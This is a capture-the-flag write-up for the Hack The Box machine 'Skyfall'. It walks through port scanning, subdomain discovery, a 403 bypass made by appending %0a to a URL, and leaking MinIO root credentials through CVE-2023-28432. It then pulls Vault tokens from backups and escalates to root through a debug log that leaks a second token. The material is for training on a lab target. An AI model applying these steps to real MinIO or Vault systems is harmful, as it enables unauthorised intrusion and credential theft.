Skyfall
Recon
Let's start with a nmap scan.
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 skyfall.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:29 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.041s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 11.01 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -p 22,80 -sC -sV -T4 skyfall.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-09 07:31 BST
Nmap scan report for skyfall.htb (10.10.11.254)
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA)
|_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Skyfall - Introducing Sky Storage!
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
Let's visit the website. It look a cloud storage service. We are also able to find a team section and 3 email IDs.
Directory enumeration uncovered multiple image assets, which are not deemed valuable. Subsequently, subdomain enumeration using ffuf revealed the presence of a subdomain named demo.skyfall.htb
. Let's explore this subdomain to gather additional information.

Initial Access
We have a login page with demo login details: guest:guest
.


On the left panel, there is an entry labeled "Min10 Metrics." However, attempting to access Min10 Metrics directly results in a 403 forbidden error. This access restriction can be circumvented by appending %0a
at the end of the URL.

We can see a URL at the endpoint.
http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
MinIO is reported to have the CVE-2023-28432 vulnerability, which entails an information leak risk. Exploiting this vulnerability can result in the exposure of sensitive information.
We can use this github link to exploit this vulnerability:

We've obtained:
"MINIO_ROOT_USER": "5Gr*****************"
"MINIO_ROOT_PASSWORD": "Gkp*****************"
To install the Min10 client follow the steps at:
Now let’s execute the Min10 client.
mc alias set myminio http://prd23-s3-backend.skyfall.htb/ 5Gr***************** Gkp*****************
Let’s check for files.
mc ls -r --versions myminio

Here we can find some backup files with the .gz extension. Let's download those files and decompress them.

Upon further enumeration of files with the .gz extension, we found these.
export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb/"
export VAULT_TOKEN="hvs.*****************************************"

To install Vault we have to Download the Vault Binary First.
Add “prd23-vault-internal.skyfall.htb” to the /etc/hosts file. Then, run the command as follows:
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb/" export VAULT_TOKEN="hvs.**************************************************"
We can log in now.

When we list the SSH
roles, we see different roles, but for now we can only access dev_otp_key_role
.

To obtain user access, execute the following code. An OTP will be generated, and use the OTP as the password for the SSH connection:
./vault ssh -role dev_otp_key_role -mode otp askyy@10.10.11.254

We've got our first flag.
Privilege Escalation
askyy@skyfall:~$ sudo -l
Matching Defaults entries for askyy on skyfall:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User askyy may run the following commands on skyfall:
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal ^-c /etc/vault-unseal.yaml -[vhd]+$
(ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
Upon executing the following command, we observe the creation of a debug.log file.

Upon inspecting the debug.log file, we discover an additional Vault Token.

Next, we must substitute the Vault Token with a fresh one.
export VAULT_TOKEN=hvs.I0e*********************
Once the role has been configured as admin_otp_key_role, we gain access to log in as root.
vault ssh -role admin_otp_key_role -mode OTP -strict-host-key-checking=no root@10.10.11.254

We are root and have our root flag.
Last updated
Was this helpful?